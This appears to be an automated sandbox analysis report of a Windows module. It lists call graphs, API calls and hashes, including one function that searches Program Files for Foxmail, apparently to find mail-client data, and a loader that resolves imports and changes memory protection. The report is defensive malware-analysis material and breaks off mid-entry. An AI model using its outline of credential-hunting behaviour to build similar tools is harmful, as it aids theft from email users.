6723 21369c2d 6718->6723 6719->6725 6726 21366368 _free 20 API calls 6719->6726 6721->6719 6721->6725 6729 21369ca9 6721->6729 6774 213698f5 6722->6774 6723->6719 6767 21369807 6723->6767 6725->6692 6728 21369cf2 6726->6728 6731 21366355 __dosmaperr 20 API calls 6728->6731 6732 21369cc4 6729->6732 6733 21369cb0 6729->6733 6731->6725 6789 21366332 6732->6789 6734 21366368 _free 20 API calls 6733->6734 6736 21369cb5 6734->6736 6737 21366355 __dosmaperr 20 API calls 6736->6737 6737->6725 6910 21368c9e RtlLeaveCriticalSection 6738->6910 6740 21369aea 6740->6676 6794 21369f8d 6741->6794 6816 21368dbc 6744->6816 6746 213696c2 6747 213696c7 6746->6747 6825 21365af6 GetLastError 6746->6825 6747->6708 6747->6709 6749 213696ea 6749->6747 6750 21369708 GetConsoleMode 6749->6750 6750->6747 6754 2136969f 6751->6754 6755 2136966a 6751->6755 6752 213696a1 GetLastError 6752->6754 6753 2136a181 WriteConsoleW CreateFileW 6753->6755 6754->6721 6755->6752 6755->6753 6755->6754 6760 213694f5 6756->6760 6766 21369607 6756->6766 6757 21362ada _ValidateLocalCookies 5 API calls 6759 21369641 6757->6759 6759->6721 6761 213679e6 40 API calls __fassign 6760->6761 6762 2136957b WideCharToMultiByte 6760->6762 6765 213695d2 WriteFile 6760->6765 6760->6766 6889 21367c19 6760->6889 6761->6760 6763 213695a1 WriteFile 6762->6763 6762->6766 6763->6760 6764 2136962a GetLastError 6763->6764 6764->6766 6765->6760 6765->6764 6766->6757 6771 21369816 6767->6771 6768 213698d8 6769 21362ada _ValidateLocalCookies 5 API calls 6768->6769 6773 213698f1 6769->6773 6770 21369894 WriteFile 6770->6771 6772 213698da GetLastError 6770->6772 6771->6768 6771->6770 6772->6768 6773->6721 6775 21369904 6774->6775 6776 21369a0f 6775->6776 6779 21369986 WideCharToMultiByte 6775->6779 6781 213699bb WriteFile 6775->6781 6777 21362ada _ValidateLocalCookies 5 API calls 6776->6777 6778 21369a1e 6777->6778 6778->6721 6780 21369a07 GetLastError 6779->6780 6779->6781 6780->6776 6781->6775 6781->6780 6783 21369737 6782->6783 6784 213697ea 6783->6784 6785 213697a9 WriteFile 6783->6785 6786 21362ada _ValidateLocalCookies 5 API calls 6784->6786 6785->6783 6787 213697ec GetLastError 6785->6787 6788 21369803 6786->6788 6787->6784 6788->6721 6790 21366355 __dosmaperr 20 API calls 6789->6790 6791 2136633d _free 6790->6791 6792 21366368 _free 20 API calls 6791->6792 6793 21366350 6792->6793 6793->6725 6803 21368d52 6794->6803 6796 21369f9f 6797 21369fa7 6796->6797 6798 21369fb8 SetFilePointerEx 6796->6798 6800 21366368 _free 20 API calls 6797->6800 6799 21369fd0 GetLastError 6798->6799 6802 21369fac 6798->6802 6801 21366332 __dosmaperr 20 API calls 6799->6801 6800->6802 6801->6802 6802->6697 6804 21368d74 6803->6804 6805 21368d5f 6803->6805 6807 21366355 __dosmaperr 20 API calls 6804->6807 6810 21368d99 6804->6810 6806 21366355 __dosmaperr 20 API calls 6805->6806 6808 21368d64 6806->6808 6811 21368da4 6807->6811 6809 21366368 _free 20 API calls 6808->6809 6813 21368d6c 6809->6813 6810->6796 6812 21366368 _free 20 API calls 6811->6812 6814 21368dac 6812->6814 6813->6796 6815 213662ac _abort 26 API calls 6814->6815 6815->6813 6817 21368dd6 6816->6817 6818 21368dc9 6816->6818 6821 21368de2 6817->6821 6822 21366368 _free 20 API calls 6817->6822 6819 21366368 _free 20 API calls 6818->6819 6820 21368dce 6819->6820 6820->6746 6821->6746 6823 21368e03 6822->6823 6824 213662ac _abort 26 API calls 6823->6824 6824->6820 6826 21365b0c 6825->6826 6827 21365b12 6825->6827 6828 21365e08 _abort 11 API calls 6826->6828 6829 2136637b _abort 20 API calls 6827->6829 6831 21365b61 SetLastError 6827->6831 6828->6827 6830 21365b24 6829->6830 6832 21365b2c 6830->6832 6833 21365e5e _abort 11 API calls 6830->6833 6831->6749 6834 2136571e _free 20 API calls 6832->6834 6835 21365b41 6833->6835 6836 21365b32 6834->6836 6835->6832 6837 21365b48 6835->6837 6838 21365b6d SetLastError 6836->6838 6839 2136593c _abort 20 API calls 6837->6839 6845 213655a8 6838->6845 6840 21365b53 6839->6840 6842 2136571e _free 20 API calls 6840->6842 6844 21365b5a 6842->6844 6844->6831 6844->6838 6856 21367613 6845->6856 6848 213655b8 6850 213655c2 IsProcessorFeaturePresent 6848->6850 6855 213655e0 6848->6855 6852 213655cd 6850->6852 6854 213660e2 _abort 8 API calls 6852->6854 6854->6855 6886 21364bc1 6855->6886 6857 21367581 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6856->6857 6858 213655ad 6857->6858 6858->6848 6859 2136766e 6858->6859 6860 2136767a _abort 6859->6860 6861 21365b7a _abort 20 API calls 6860->6861 6863 213676a1 _abort 6860->6863 6867 213676a7 _abort 6860->6867 6861->6863 6862 213676f3 6864 21366368 _free 20 API calls 6862->6864 6863->6862 6863->6867 6885 213676d6 6863->6885 6865 213676f8 6864->6865 6866 213662ac _abort 26 API calls 6865->6866 6866->6885 6869 21365671 _abort RtlEnterCriticalSection 6867->6869 6871 2136771f 6867->6871 6868 2136bdc9 _abort 5 API calls 6870 21367875 6868->6870 6869->6871 6870->6848 6872 2136777e 6871->6872 6874 21367776 6871->6874 6876 213656b9 _abort RtlLeaveCriticalSection 6871->6876 6882 213677a9 6871->6882 6878 21367665 _abort 38 API calls 6872->6878 6872->6882 6873 2136782e _abort RtlLeaveCriticalSection 6875 213677fd 6873->6875 6877 21364bc1 _abort 28 API calls 6874->6877 6879 21365af6 _abort 38 API calls 6875->6879 6883 2136780c 6875->6883 6875->6885 6876->6874 6877->6872 6880 2136779f 6878->6880 6879->6883 6881 21367665 _abort 38 API calls 6880->6881 6881->6882 6882->6873 6884 21365af6 _abort 38 API calls 6883->6884 6883->6885 6884->6885 6885->6868 6887 2136499b _abort 28 API calls 6886->6887 6888 21364bd2 6887->6888 6890 21365af6 _abort 38 API calls 6889->6890 6891 21367c24 6890->6891 6894 21367a00 6891->6894 6895 21367a13 6894->6895 6896 21367a28 6894->6896 6895->6896 6898 21367f0f 6895->6898 6896->6760 6899 21367f1b ___scrt_is_nonwritable_in_current_image 6898->6899 6900 21365af6 _abort 38 API calls 6899->6900 6901 21367f24 6900->6901 6902 21367f72 _abort 6901->6902 6903 21365671 _abort RtlEnterCriticalSection 6901->6903 6902->6896 6904 21367f42 6903->6904 6905 21367f86 __fassign 20 API calls 6904->6905 6906 21367f56 6905->6906 6907 21367f75 __fassign RtlLeaveCriticalSection 6906->6907 6908 21367f69 6907->6908 6908->6902 6909 213655a8 _abort 38 API calls 6908->6909 6909->6902 6910->6740 6914 2136ad24 6911->6914 6913 2136adca 6913->6656 6915 2136ad30 ___scrt_is_nonwritable_in_current_image 6914->6915 6925 21368c7b RtlEnterCriticalSection 6915->6925 6917 2136ad3e 6918 2136ad65 6917->6918 6919 2136ad70 6917->6919 6926 2136ae4d 6918->6926 6921 21366368 _free 20 API calls 6919->6921 6922 2136ad6b 6921->6922 6941 2136ad9a 6922->6941 6924 2136ad8d _abort 6924->6913 6925->6917 6927 21368d52 26 API calls 6926->6927 6930 2136ae5d 6927->6930 6928 2136ae63 6944 21368cc1 6928->6944 6930->6928 6931 2136ae95 6930->6931 6933 21368d52 26 API calls 6930->6933 6931->6928 6934 21368d52 26 API calls 6931->6934 6937 2136ae8c 6933->6937 6935 2136aea1 CloseHandle 6934->6935 6935->6928 6938 2136aead GetLastError 6935->6938 6936 2136aedd 6936->6922 6940 21368d52 26 API calls 6937->6940 6938->6928 6939 21366332 __dosmaperr 20 API calls 6939->6936 6940->6931 6953 21368c9e RtlLeaveCriticalSection 6941->6953 6943 2136ada4 6943->6924 6945 21368d37 6944->6945 6946 21368cd0 6944->6946 6947 21366368 _free 20 API calls 6945->6947 6946->6945 6952 21368cfa 6946->6952 6948 21368d3c 6947->6948 6949 21366355 __dosmaperr 20 API calls 6948->6949 6950 21368d27 6949->6950 6950->6936 6950->6939 6951 21368d21 SetStdHandle 6951->6950 6952->6950 6952->6951 6953->6943 6954->6608 6955->6585 7532 21362049 7533 21362055 ___scrt_is_nonwritable_in_current_image 7532->7533 7534 213620d3 7533->7534 7535 2136207d 7533->7535 7545 2136205e 7533->7545 7536 21362639 ___scrt_fastfail 4 API calls 7534->7536 7546 2136244c 7535->7546 7538 213620da 7536->7538 7539 21362082 7555 21362308 7539->7555 7541 21362087 __RTC_Initialize 7558 213620c4 7541->7558 7543 2136209f 7561 2136260b 7543->7561 7547 21362451 ___scrt_release_startup_lock 7546->7547 7548 21362455 7547->7548 7551 21362461 7547->7551 7567 2136527a 7548->7567 7552 2136246e 7551->7552 7570 2136499b 7551->7570 7552->7539 7645 213634c7 RtlInterlockedFlushSList 7555->7645 7557 21362312 7557->7541 7647 2136246f 7558->7647 7560 213620c9 ___scrt_release_startup_lock 7560->7543 7562 21362617 7561->7562 7563 2136262d 7562->7563 7655 213653ed 7562->7655 7563->7545 7566 21363529 ___vcrt_uninitialize 8 API calls 7566->7563 7592 21365132 7567->7592 7571 213649a7 _abort 7570->7571 7572 213649bf 7571->7572 7614 21364af5 GetModuleHandleW 7571->7614 7623 21365671 RtlEnterCriticalSection 7572->7623 7578 213649c7 7580 21364a3c 7578->7580 7583 2136527a _abort 20 API calls 7578->7583 7590 21364a65 7578->7590 7585 21364669 _abort 5 API calls 7580->7585 7589 21364a54 7580->7589 7581 21364a82 7627 21364ab4 7581->7627 7582 21364aae 7635 2136bdc9 7582->7635 7583->7580 7585->7589 7586 21364669 _abort 5 API calls 7586->7590 7589->7586 7624 21364aa5 7590->7624 7595 213650e1 7592->7595 7594 2136245f 7594->7539 7596 213650ed ___scrt_is_nonwritable_in_current_image 7595->7596 7603 21365671 RtlEnterCriticalSection 7596->7603 7598 213650fb 7604 2136515a 7598->7604 7602 21365119 _abort 7602->7594 7603->7598 7605 2136517a 7604->7605 7608 21365182 7604->7608 7606 21362ada _ValidateLocalCookies 5 API calls 7605->7606 7607 21365108 7606->7607 7610 21365126 7607->7610 7608->7605 7609 2136571e _free 20 API calls 7608->7609 7609->7605 7613 213656b9 RtlLeaveCriticalSection 7610->7613 7612 21365130 7612->7602 7613->7612 7615 213649b3 7614->7615 7615->7572 7616 21364b39 GetModuleHandleExW 7615->7616 7617 21364b63 GetProcAddress 7616->7617 7622 21364b78 7616->7622 7617->7622 7618 21364b95 7620 21362ada _ValidateLocalCookies 5 API calls 7618->7620 7619 21364b8c FreeLibrary 7619->7618 7621 21364b9f 7620->7621 7621->7572 7622->7618 7622->7619 7623->7578 7638 213656b9 RtlLeaveCriticalSection 7624->7638 7626 21364a7e 7626->7581 7626->7582 7639 21366025 7627->7639 7630 21364ae2 7633 21364b39 _abort 8 API calls 7630->7633 7631 21364ac2 GetPEB 7631->7630 7632 21364ad2 GetCurrentProcess TerminateProcess 7631->7632 7632->7630 7634 21364aea ExitProcess 7633->7634 7636 21362ada _ValidateLocalCookies 5 API calls 7635->7636 7637 2136bdd4 7636->7637 7637->7637 7638->7626 7640 2136604a 7639->7640 7644 21366040 7639->7644 7641 21365c45 _abort 5 API calls 7640->7641 7641->7644 7642 21362ada _ValidateLocalCookies 5 API calls 7643 21364abe 7642->7643 7643->7630 7643->7631 7644->7642 7646 213634d7 7645->7646 7646->7557 7652 213653ff 7647->7652 7650 2136391b ___vcrt_uninitialize_ptd 6 API calls 7651 2136354d 7650->7651 7651->7560 7653 21365c2b 11 API calls 7652->7653 7654 21362476 7653->7654 7654->7650 7658 213674da 7655->7658 7660 213674f3 7658->7660 7659 21362ada _ValidateLocalCookies 5 API calls 7661 21362625 7659->7661 7660->7659 7661->7566 7700 21368a89 7701 21366d60 51 API calls 7700->7701 7702 21368a8e 7701->7702

                    Executed Functions

                    Function 213610F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21361137
                    • lstrcatW.KERNEL32(?,?), ref: 21361151
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136115C
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136116D
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136117C
                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21361193
                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 213611D0
                    • FindClose.KERNELBASE(00000000), ref: 213611DB
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                    • String ID:
                    • API String ID: 1083526818-0
                    • Opcode ID: 7a25d93faef2d2edd72855d774ab37eba1fe2120f17253664f79f218a79a5663
                    • Instruction ID: 87082b1bc3d719b8523b73db196e76ebcb5ca396cf06c1a4ef553db76704ee0b
                    • Opcode Fuzzy Hash: 7a25d93faef2d2edd72855d774ab37eba1fe2120f17253664f79f218a79a5663
                    • Instruction Fuzzy Hash: 4B21D572944389ABD721EBA59C48F9B7BDDEF84354F00092AF998D3190E734D60487AA
                    Function 213612EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21361434
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21361137
                      • Part of subcall function 213610F1: lstrcatW.KERNEL32(?,?), ref: 21361151
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136115C
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136116D
                      • Part of subcall function 213610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2136117C
                      • Part of subcall function 213610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21361193
                      • Part of subcall function 213610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 213611D0
                      • Part of subcall function 213610F1: FindClose.KERNELBASE(00000000), ref: 213611DB
                    • lstrlenW.KERNEL32(?), ref: 213614C5
                    • lstrlenW.KERNEL32(?), ref: 213614E0
                    • lstrlenW.KERNEL32(?,?), ref: 2136150F
                    • lstrcatW.KERNEL32(00000000), ref: 21361521
                    • lstrlenW.KERNEL32(?,?), ref: 21361547
                    • lstrcatW.KERNEL32(00000000), ref: 21361553
                    • lstrlenW.KERNEL32(?,?), ref: 21361579
                    • lstrcatW.KERNEL32(00000000), ref: 21361585
                    • lstrlenW.KERNEL32(?,?), ref: 213615AB
                    • lstrcatW.KERNEL32(00000000), ref: 213615B7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                    • String ID: )$Foxmail$ProgramFiles
                    • API String ID: 672098462-2938083778
                    • Opcode ID: 8458e4efcca682b961dbf222a22be87b2b13c22d258e48c8d564634688d3f224
                    • Instruction ID: b6e4a10b61a557ba1589fbbf79149fb5823b8a2f694e18d221e5efea45c8a019
                    • Opcode Fuzzy Hash: 8458e4efcca682b961dbf222a22be87b2b13c22d258e48c8d564634688d3f224
                    • Instruction Fuzzy Hash: B881E171A00358A9DF20CBA5DC85FEE733EEF84704F000596FA08E7194EA755A85CB98
                    Function 2136C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetModuleHandleA.KERNEL32(2136C7DD), ref: 2136C7E6
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                      • Part of subcall function 2136C803: GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                      • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                      • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction ID: babf482798fc4a8c37ee54b5f216a7d438ccd560ddf6e6bd47e6647d1c175250
                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                    • Instruction Fuzzy Hash: 9601C0009452DE2CFB3156794C05AAAAF9E9B27678B10165AA240C619BD9A48506C3FE
                    Function 2136C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 79 2136c7a7-2136c7bc 80 2136c7be-2136c7c6 79->80 81 2136c82d 79->81 80->81 82 2136c7c8-2136c7f6 call 2136c7e6 80->82 83 2136c82f-2136c833 81->83 90 2136c86c-2136c86e 82->90 91 2136c7f8 82->91 85 2136c835-2136c83d GetModuleHandleA 83->85 86 2136c872 call 2136c877 83->86 89 2136c83f-2136c847 85->89 89->89 92 2136c849-2136c84c 89->92 93 2136c866-2136c86b 90->93 94 2136c870 90->94 95 2136c7fa-2136c7fe 91->95 96 2136c85b-2136c85e 91->96 92->83 97 2136c84e-2136c850 92->97 93->90 94->92 102 2136c865 95->102 103 2136c800-2136c80b GetProcAddress 95->103 100 2136c85f-2136c860 GetProcAddress 96->100 98 2136c856-2136c85a 97->98 99 2136c852-2136c854 97->99 98->96 99->100 100->102 102->93 103->81 104 2136c80d-2136c81a VirtualProtect 103->104 105 2136c82c 104->105 106 2136c81c-2136c82a VirtualProtect 104->106 105->81 106->105
                    APIs
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                      • Part of subcall function 2136C7E6: GetModuleHandleA.KERNEL32(2136C7DD), ref: 2136C7E6
                      • Part of subcall function 2136C7E6: GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                      • Part of subcall function 2136C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                      • Part of subcall function 2136C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProtectVirtual
                    • String ID:
                    • API String ID: 2099061454-0
                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction ID: 7ff0b0b061e8d95ce0c66448cdc0fa1da54b0f08aaa28ed734d475b2786dbcec
                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                    • Instruction Fuzzy Hash: D52127214082CA6FE7328B788C04AA67FDE9F27278F18069AD140CB147D5A88555C3FE
                    Function 2136C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 107 2136c803-2136c80b GetProcAddress 108 2136c82d 107->108 109 2136c80d-2136c81a VirtualProtect 107->109 112 2136c82f-2136c833 108->112 110 2136c82c 109->110 111 2136c81c-2136c82a VirtualProtect 109->111 110->108 111->110 113 2136c835-2136c83d GetModuleHandleA 112->113 114 2136c872 call 2136c877 112->114 116 2136c83f-2136c847 113->116 116->116 117 2136c849-2136c84c 116->117 117->112 118 2136c84e-2136c850 117->118 119 2136c856-2136c85e 118->119 120 2136c852-2136c854 118->120 121 2136c85f-2136c865 GetProcAddress 119->121 120->121 124 2136c866-2136c86e 121->124 126 2136c870 124->126 126->117
                    APIs
                    • GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
                    • GetModuleHandleA.KERNEL32(?,2136C7DD), ref: 2136C838
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: AddressProcProtectVirtual$HandleModule
                    • String ID:
                    • API String ID: 2152742572-0
                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction ID: 05ce6d80f8dcbcc6313d09320e7127f5f04781a0da13fa76bd63b52c16d64937
                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                    • Instruction Fuzzy Hash: 19F0C2415452CD3CFB3145B80C45EBA9FCE8B37678B101A5AE204C718BD8A9850683FE
                    Function 2136731F Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 127 2136731f-21367324 128 21367326-2136733e 127->128 129 21367340-21367344 128->129 130 2136734c-21367355 128->130 129->130 133 21367346-2136734a 129->133 131 21367367 130->131 132 21367357-2136735a 130->132 137 21367369-21367376 GetStdHandle 131->137 135 21367363-21367365 132->135 136 2136735c-21367361 132->136 134 213673c7-213673cb 133->134 134->128 138 213673d1-213673d4 134->138 135->137 136->137 139 21367385 137->139 140 21367378-2136737a 137->140 142 21367387-21367389 139->142 140->139 141 2136737c-21367383 GetFileType 140->141 141->142 143 2136738b-21367396 142->143 144 213673a9-213673bb 142->144 145 2136739e-213673a1 143->145 146 21367398-2136739c 143->146 144->134 147 213673bd-213673c0 144->147 145->134 148 213673a3-213673a7 145->148 146->134 147->134 148->134
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 2136736B
                    • GetFileType.KERNELBASE(00000000), ref: 2136737D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: FileHandleType
                    • String ID:
                    • API String ID: 3000768030-0
                    • Opcode ID: 0b30d5be96a79b854785aedcbc227c682f7a5df7061268897269aada57c87a38
                    • Instruction ID: 410914b41b8d0dd00a697abb55558f164c2e724579fc87d06a8443b9506fa341
                    • Opcode Fuzzy Hash: 0b30d5be96a79b854785aedcbc227c682f7a5df7061268897269aada57c87a38
                    • Instruction Fuzzy Hash: 8C11DA31204BC286D3314E3E8C86A12BE9FA747178B74071DDDB6C66F9D334D58682C8
                    Function 21361EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 149 21361eec-21361ef5 150 21361ef7-21361efa 149->150 151 21361f2a-21361f35 dllmain_crt_process_detach 149->151 152 21361f1c-21361f28 dllmain_crt_process_attach 150->152 153 21361efc-21361eff 150->153 154 21361f3a 151->154 152->154 155 21361f12 call 213623ec 153->155 156 21361f01-21361f04 153->156 157 21361f3b-21361f3c 154->157 162 21361f17-21361f1a 155->162 158 21361f06-21361f09 156->158 159 21361f0b-21361f10 call 2136240b 156->159 158->157 159->162 162->157
                    APIs
                    • dllmain_crt_process_attach.LIBCMT ref: 21361F22
                    • dllmain_crt_process_detach.LIBCMT ref: 21361F35
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                    • String ID:
                    • API String ID: 3750050125-0
                    • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                    • Instruction ID: ebdbc60234eb150ad9824978d68ddac2c0ef8f381f560bff3a9b2c7351368b8a
                    • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                    • Instruction Fuzzy Hash: 04E065328581CB9EDB015FB89815A6D3EDFA7B224DF004B2AA5418D16CC735C258D16D

                    Non-executed Functions

                    Function 213660E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 213661DA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 213661E4
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 213661F1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 0fe45435b174d2658ba89fd09b1042d7e1e67c87516d3cf5dfff1615dfc5111d
                    • Instruction ID: 43ae443f4647e51271a2f9f70d9ff2ff11c958bc23150a17b20bf7bb7e73f482
                    • Opcode Fuzzy Hash: 0fe45435b174d2658ba89fd09b1042d7e1e67c87516d3cf5dfff1615dfc5111d
                    • Instruction Fuzzy Hash: F3310A7494125C9BCB21DF68C9887CDBBB9FF18314F1041DAE81CA7260EB349B818F49
                    Function 21364AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082,21372108,0000000C,21361F3A,?), ref: 21364AD5
                    • TerminateProcess.KERNEL32(00000000,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082,21372108,0000000C,21361F3A,?), ref: 21364ADC
                    • ExitProcess.KERNEL32 ref: 21364AEE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmpDownload File
